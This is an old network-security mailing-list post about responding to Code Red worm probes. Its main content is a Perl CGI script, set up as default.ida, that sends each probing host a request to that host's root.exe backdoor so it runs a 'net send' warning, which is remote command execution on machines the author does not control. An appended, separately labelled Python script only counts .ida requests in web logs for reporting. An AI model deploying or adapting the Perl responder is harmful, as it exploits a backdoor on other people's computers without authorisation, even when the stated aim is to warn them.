[Dshield] IIS Logs

John Hardin johnh at aproposretail.com
Fri Mar 29 17:26:58 GMT 2002


On Thu, 2002-03-28 at 22:56, Forum Admin wrote:
>  
> I'm working on a way to have it post a console
> message to the infected computer, which would remain on the victim's
> screen until they hit OK.

Here's one possibility.

httpd.conf:    AddHandler cgi-script .ida

Perl script named default.ida in the webserver root:

#!/usr/bin/perl

use CGI qw(param);
use strict;

my $ip = $ENV{"REMOTE_ADDR"};

system("lynx -dump 'http://$ip/scripts/root.exe?/c+net+send+localhost+Your+computer+is+infected+by+a+Code+Red+worm.+I+did+not+infect+you.+This+is+a+courtesy+response+generated+when+your+computer+attempted+to+infect+mine.+Your+computer+is+completely+exposed.+Visit+http://www.dynwebdev.com/codered/alert.htm+immediately!' &");

print "Content-type: text/html\n\n";
print "<html><body>";
print "<H1>This is an automated CODE RED responder.</H1>";
print "<H2>This script attempts to display a warning message on the computer requesting this page.</H2>";
print "<H2>That computer appears to be at $ip</H2>";
print "</body></html>";


-- 
John Hardin                                   <johnh at aproposretail.com>
Internal Systems Administrator                    voice: (425) 672-1304
Apropos Retail Management Systems, Inc.             fax: (425) 672-0192
-----------------------------------------------------------------------
 "They [media giants] have no idea how to do business with resourceful
  human beings rather than passive vegetables. So they run to [the]
  government for protection."
                    -- Doc Searls on the SSSCA, in Linux Journal
-----------------------------------------------------------------------
 47 days until Star Wars episode II: Attack of the Clones
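
A passive counterpart to the handler in the message above, as an added example that is not part of the original post: it reads the web server's access log, picks out requests for .ida paths (the extension the AddHandler line maps), and tallies them per source address for reporting. Apache common log format is assumed; the log lines, addresses and function names are constructed for illustration.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "method target proto" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

# Constructed sample lines (documentation addresses, shortened query strings).
SAMPLE_LOG = """\
192.0.2.10 - - [29/Mar/2002:09:14:02 -0800] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 200 312
203.0.113.5 - - [29/Mar/2002:09:14:30 -0800] "GET /index.html HTTP/1.0" 200 1043
198.51.100.7 - - [29/Mar/2002:09:15:40 -0800] "GET /DEFAULT.IDA?XXXXXXXXXXXXXXXX HTTP/1.0" 200 312
this line is not a log record
192.0.2.10 - - [29/Mar/2002:09:17:11 -0800] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 200 312
"""


def ida_probes(lines):
    """Yield (source_ip, timestamp) for each logged request to a .ida path."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip anything that is not a well-formed log record
        ip, ts, _method, target, _status = m.groups()
        path = target.split("?", 1)[0]  # drop the query string before matching
        if path.lower().endswith(".ida"):
            yield ip, ts


def summarize(lines):
    """Return [(source_ip, hit_count, first_seen)] sorted by hit count, descending."""
    counts = Counter()
    first_seen = {}
    for ip, ts in ida_probes(lines):
        counts[ip] += 1
        first_seen.setdefault(ip, ts)  # keep the earliest timestamp per source
    return [(ip, n, first_seen[ip]) for ip, n in counts.most_common()]


if __name__ == "__main__":
    for ip, n, ts in summarize(SAMPLE_LOG.splitlines()):
        print(f"{ip}\t{n} request(s)\tfirst seen {ts}")
```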



